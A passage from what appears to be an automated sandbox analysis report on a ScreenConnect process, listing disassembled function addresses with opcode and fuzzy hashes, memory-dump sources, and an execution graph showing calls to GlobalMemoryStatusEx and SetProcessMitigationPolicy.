                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7511D33060CA884FE7D4EF38D4986B1B7E1FF99355B1401BED88DC72A6DE259841C745
                                                                                                                                                                                                                                                                          Function 00007FF849255848 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0a91e04272cff9f9891f5146d098376abdb3d79a441a2775ea18db2f9521b667
                                                                                                                                                                                                                                                                          • Instruction ID: 32a7d83074d2860abf6c362fb175f7f89a773b27f08d9a47f79040d1b1f57d2b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a91e04272cff9f9891f5146d098376abdb3d79a441a2775ea18db2f9521b667
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5011EF31A0C9584FF7D4EE28E858672B3D1FBE8365F1405BED84DC32A5DE25A880C744
                                                                                                                                                                                                                                                                          Function 00007FF8492587B0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 874c89ae5f71fa436ad54c34adec99eff1759555c75e0eb0f14aaccc0a002498
                                                                                                                                                                                                                                                                          • Instruction ID: a61dcb1508316bf70cf9e4883e75679575ab413345e52611738f78a0d19b2081
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 874c89ae5f71fa436ad54c34adec99eff1759555c75e0eb0f14aaccc0a002498
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D11B233F0DD9E8FFBA9AB687C251F8B691EF44754F0404BAD02DC32D2DE6898118285
                                                                                                                                                                                                                                                                          Function 00007FF84925519D Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1257878aa4d8d1c541b7e46435180c696195cf61a8e4b362a51a6ef06dda3f01
                                                                                                                                                                                                                                                                          • Instruction ID: 5ba650cbbe1b25689bbc7b48f04f1387cf510922aa8b6fc155b2a94b7fa871d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1257878aa4d8d1c541b7e46435180c696195cf61a8e4b362a51a6ef06dda3f01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96119375D0CA8A8FEBA5EF74A8914A87FB0FF55304F0540AAD06CC3296DA25A406CB01
                                                                                                                                                                                                                                                                          Function 00007FF849254699 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9a9f6d94f033d840e69b12452317cbfa6bd11d3fa9b48998630331a41f2c101f
                                                                                                                                                                                                                                                                          • Instruction ID: 6532f381e37bb30bb3d8c8fb45871c637896a7dc12ad22d3cc12d04e58a62a73
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a9f6d94f033d840e69b12452317cbfa6bd11d3fa9b48998630331a41f2c101f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4811022190DEF30FF7B9A7294460375EAE2EF953A0F1881BAC45DC61E6DD2CAC818701
                                                                                                                                                                                                                                                                          Function 00007FF8492527E7 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e45c4ab808abf5b7ced9e8fd4c21dab487d8f6d2e7f4bb68b68d7de167cefab5
                                                                                                                                                                                                                                                                          • Instruction ID: ef183af9e3b2decc6869d9bc31db204f54a772b52793b25f2185cf6b9a69dd55
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e45c4ab808abf5b7ced9e8fd4c21dab487d8f6d2e7f4bb68b68d7de167cefab5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6119030A1C9968FEA98EF288045B61B7A1FF64754F0440F8C44ECB2C7CE28EC05C780
                                                                                                                                                                                                                                                                          Function 00007FF849252850 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 22352999b8d416e755033bfc28c04b87fa11b99877125572629a2472962e5e6e
                                                                                                                                                                                                                                                                          • Instruction ID: f0d302f7a33f2a88a28591ea970391ae0fd8117ae15e856a8ac7abaffc274e76
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22352999b8d416e755033bfc28c04b87fa11b99877125572629a2472962e5e6e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6118231A189964FEB98EF28C445B61B7E1FF64754F0440E8C44DCB2C7DE29E805C780
                                                                                                                                                                                                                                                                          Function 00007FF849250908 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 76e5e206835d8e5a4f06a2d7738eceba6184165c21bc95ac5613c27636085eb2
                                                                                                                                                                                                                                                                          • Instruction ID: 5858119b174e93fbd0c1e0e90f2467120da95e360da48f343c59246dc921848d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e5e206835d8e5a4f06a2d7738eceba6184165c21bc95ac5613c27636085eb2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0E52395DC9B1AFBA8A52D68A44F5D7D0EB6467470402B7C41DC218EDD19E9C243C0
                                                                                                                                                                                                                                                                          Function 00007FF849253A19 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f63965d3f57497dff2ad0b25127507a50f50a29d64ad4ba7db2d8fc1879771af
                                                                                                                                                                                                                                                                          • Instruction ID: 4f90df31dea01b3a2b4021ad8c557320d5da99ee090f9a09f0781abb24d390aa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f63965d3f57497dff2ad0b25127507a50f50a29d64ad4ba7db2d8fc1879771af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0303550D6DC9FCB42EB64D4658E6BFB0EE16324B1501CBE089CB053D6619A55CB82
                                                                                                                                                                                                                                                                          Function 00007FF8492509B1 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: afed73e8fdca03120223b060e0cc7333d01a01ac525f5f0661f75cf1717be1bd
                                                                                                                                                                                                                                                                          • Instruction ID: 8eedb1aa072406902949a3bd6559e80b75c004bd0dde8e351729fab9eaeaed7b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afed73e8fdca03120223b060e0cc7333d01a01ac525f5f0661f75cf1717be1bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E0D82154E7D40FE7539B3488AC8E57FA0EE1322031941EFD4C5CF4B3E5158989C752
                                                                                                                                                                                                                                                                          Function 00007FF8492546B0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 409f4fd3b695fd12bbb572018bfd9823b0e983737cde9fd1495c146f23d75c2f
                                                                                                                                                                                                                                                                          • Instruction ID: 9b885cbc34c7c350f936bc73d0f33b38a78e0ba5f9cd124d5b3f827e99fc4e9f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 409f4fd3b695fd12bbb572018bfd9823b0e983737cde9fd1495c146f23d75c2f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74E08C2594DA330AFB7C367664913BAE0C19F443A1F09407A9429800C5DDACDC818591
                                                                                                                                                                                                                                                                          Function 00007FF84925819F Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f88c0f6562edd8f8fb17321e6b4e496cdcc2fdd1c1631867907320b5257bc0e6
                                                                                                                                                                                                                                                                          • Instruction ID: 7593a485b6881bc08f830eabf0059b9065cad9f8505d6b9ef3ba8c4c772da095
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f88c0f6562edd8f8fb17321e6b4e496cdcc2fdd1c1631867907320b5257bc0e6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67C08C01B4CC690E9090722D34001B84282C6C826178801E3E808C234DC9095CC203C0
                                                                                                                                                                                                                                                                          Function 00007FF8492528EF Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                                                                                                          • Instruction ID: a3cc42da2d2f78fac4aa9f00170e5b57b811509f4cdc365bb8f18939548f49a8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59C09B20E1C5565EF254FF2444411BD11526FEC750F504436D01E951C7CE3C75015549
                                                                                                                                                                                                                                                                          Function 00007FF849252631 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                                                                                                          • Instruction ID: 7a8f47472c194f0147828f4271d485437de05e23520256a2d043882db839b795
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DA00210E5D9665DF1717A1401011BD40410FB4BA0F204136D01E951C6DE1C6E42559A

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:13.8%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:10
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                          execution_graph 14074 7ff8492492e4 14075 7ff8492492ed 14074->14075 14076 7ff8492493e2 14075->14076 14077 7ff849249489 GlobalMemoryStatusEx 14075->14077 14078 7ff8492494b5 14077->14078 14069 7ff848f38014 14071 7ff848f3801d 14069->14071 14070 7ff848f38082 14071->14070 14072 7ff848f380f6 SetProcessMitigationPolicy 14071->14072 14073 7ff848f38152 14072->14073

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 00007FF8492492E4 Relevance: 1.8, APIs: 1, Instructions: 276COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 793 7ff8492492e4-7ff8492492eb 794 7ff8492492ed-7ff8492492f5 793->794 795 7ff8492492f6-7ff849249349 793->795 794->795 798 7ff84924934b-7ff84924935a 795->798 799 7ff849249377-7ff849249385 795->799 803 7ff84924935c-7ff849249376 798->803 804 7ff8492493a4-7ff8492493a6 798->804 801 7ff8492493de 799->801 802 7ff849249387-7ff84924938a 799->802 807 7ff8492493df 801->807 805 7ff84924938c-7ff84924938e 802->805 806 7ff84924940b-7ff84924940f 802->806 803->799 810 7ff8492493a8-7ff8492493b7 804->810 811 7ff8492493a7 804->811 808 7ff84924940a 805->808 809 7ff849249390 805->809 824 7ff849249410 806->824 812 7ff84924945b-7ff84924945e 807->812 813 7ff8492493e0 807->813 808->806 816 7ff849249392-7ff849249394 809->816 817 7ff8492493d3 809->817 830 7ff849249428-7ff849249429 810->830 831 7ff8492493b9-7ff8492493bd 810->831 811->810 814 7ff849249461-7ff849249487 812->814 813->814 815 7ff8492493e1 813->815 819 7ff849249489-7ff8492494b3 GlobalMemoryStatusEx 814->819 821 7ff8492493e2-7ff849249409 815->821 822 7ff849249423-7ff849249427 815->822 823 7ff849249396 816->823 816->824 825 7ff84924944f-7ff849249453 817->825 826 7ff8492493d5 817->826 828 7ff8492494bb-7ff8492494e2 819->828 829 7ff8492494b5 819->829 821->808 822->830 832 7ff849249398-7ff84924939a 823->832 833 7ff8492493d9 823->833 834 7ff849249455-7ff849249456 825->834 835 7ff8492493d6-7ff8492493d7 826->835 836 7ff849249417-7ff849249419 826->836 829->828 837 7ff84924942b-7ff84924943c 830->837 838 7ff849249457-7ff84924945a 830->838 839 7ff84924943e-7ff84924943f 831->839 840 7ff8492493bf-7ff8492493c1 831->840 842 7ff84924939c 832->842 843 7ff849249416 832->843 833->834 844 7ff8492493db-7ff8492493dd 833->844 834->838 835->833 845 7ff84924941f 836->845 846 7ff84924941b-7ff84924941e 836->846 848 7ff84924943d 837->848 838->812 839->819 850 7ff849249440-7ff849249441 839->850 840->848 849 7ff8492493c3-7ff8492493c7 840->849 842->807 851 7ff84924939e-7ff8492493a1 842->851 843->836 844->801 852 7ff849249421 845->852 853 7ff849249422 845->853 846->845 848->839 854 7ff8492493c9 849->854 855 7ff849249443-7ff849249448 849->855 850->855 851->804 852->853 853->822 854->806 856 7ff8492493cb-7ff8492493cd 854->856 857 7ff849249449-7ff84924944e 855->857 856->857 858 7ff8492493cf-7ff8492493d1 856->858 857->825 858->817
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2950913559.00007FF849240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849240000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff849240000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1890195054-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8db51a0c392d536e6baa2ba683a49e094b35593e1a8625266c94ed36d5c14a94
                                                                                                                                                                                                                                                                          • Instruction ID: a64d97a0104139b66a679f07de9941f301e68a1fb0a458521b776d4867a34296
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db51a0c392d536e6baa2ba683a49e094b35593e1a8625266c94ed36d5c14a94
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0681473580DAE94FF775EB6888052B97FE0EF56760F0842BAD05CC75D3DA68680A8781
                                                                                                                                                                                                                                                                          Function 00007FF848F38014 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2947400073.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff848f30000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                          • Opcode ID: 333d741d7e5fc5d6d192bee40d20980b3d31b98e01c1c8f1b9944990c9a60913
                                                                                                                                                                                                                                                                          • Instruction ID: dec6a6b2e33e3316c7aa4ea21b0cae1ea0ee35c45f006f3f812672e1fd7fac52
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333d741d7e5fc5d6d192bee40d20980b3d31b98e01c1c8f1b9944990c9a60913
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99514531C1CB498FEB18AFA8984A5E97BE0EF55350F04017FE089C3192DF68A846CB95